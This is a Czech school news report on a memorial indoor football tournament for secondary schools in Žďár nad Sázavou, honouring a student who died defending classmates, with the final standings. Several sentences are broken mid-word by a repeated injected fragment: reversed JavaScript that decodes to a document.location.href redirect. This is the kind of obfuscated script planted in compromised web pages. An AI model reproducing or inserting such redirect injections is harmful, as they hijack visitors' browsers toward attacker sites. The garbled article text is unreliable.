Rainbow page separator

Žďárská „obchodka“ organizovala Memoriál Petra Vejvody

Úterý, 9. dubna 2019

Žďár nad Sázavou / Memoriál Petra Vejvody, který proběhl ve čtvrtek 28. března, organizovala obchodní škola ve spolupráci s Asociací školních spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních klubů jako okresní kolo v halové kopané. Utkalo se zde šest nejlepších středních škol okresu, které pos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupily z okrskových kol. Dějištěm finálového turnaje byla žďárská spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hala.
Již 3. ročník Memoriálu byl zároveň vzpomínkou na nedožité jednadvacetiny studenta obchodní školy Petra Vejvody, který zahynul v říjnu 2014, kdy se odvážně postavil na obranu studentek, které ohrožovala duševně nemocná žena, a při záchraně spolužaček na místě podlehl těžkému zranění. Petr Vejvoda je nositelem medaile Za hrdinství im memoriam udělené prezidentem republiky a ceny Michala Velíška za statečnost.
Finálový turnaj se vyznačoval urputným bojem o co nejlepší výsledek, ale v duchu fair play, kterého byl propagá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem právě i Petr, držitel státního vyznamenání. V turnaji se školní mužstva utkala mezi sebou, což obnášelo 15 zápasů. Nejlépe obstálo Gymnázium Žďár, získalo pohár, zlaté medaile, diplom a věcnou cenu. Mužstva na dalších místech obdržela věcné ceny a diplomy. Navíc byl oceněn nejlepší střelec turnaje Marek Zrůst z Gymnázia Žďár a nejlepší brankař Filip Pečínka z Gymnázia Bystřice.

Pořadí:
1. Gymnázium Žďár 13 b. skóre 11 : 4
2. SPŠ a VOŠ strojírenská Žďár 10 b. 10 : 3
3. SPŠ a VOŠ Studentská Žďár 9 b. 8 : 5
4. SŠ obchodní a služeb Žďár 6 b. 5 : 6
5. Gymnázium Bystřice n.P. 3 b. 7 : 9
6. Gymnázium Vel. Meziříčí 3 b. 3 : 17

Mgr. Stanislav Zedníček
Střední škola obchodní a služeb SČMSD, Žďár nad Sázavou, s.r.o.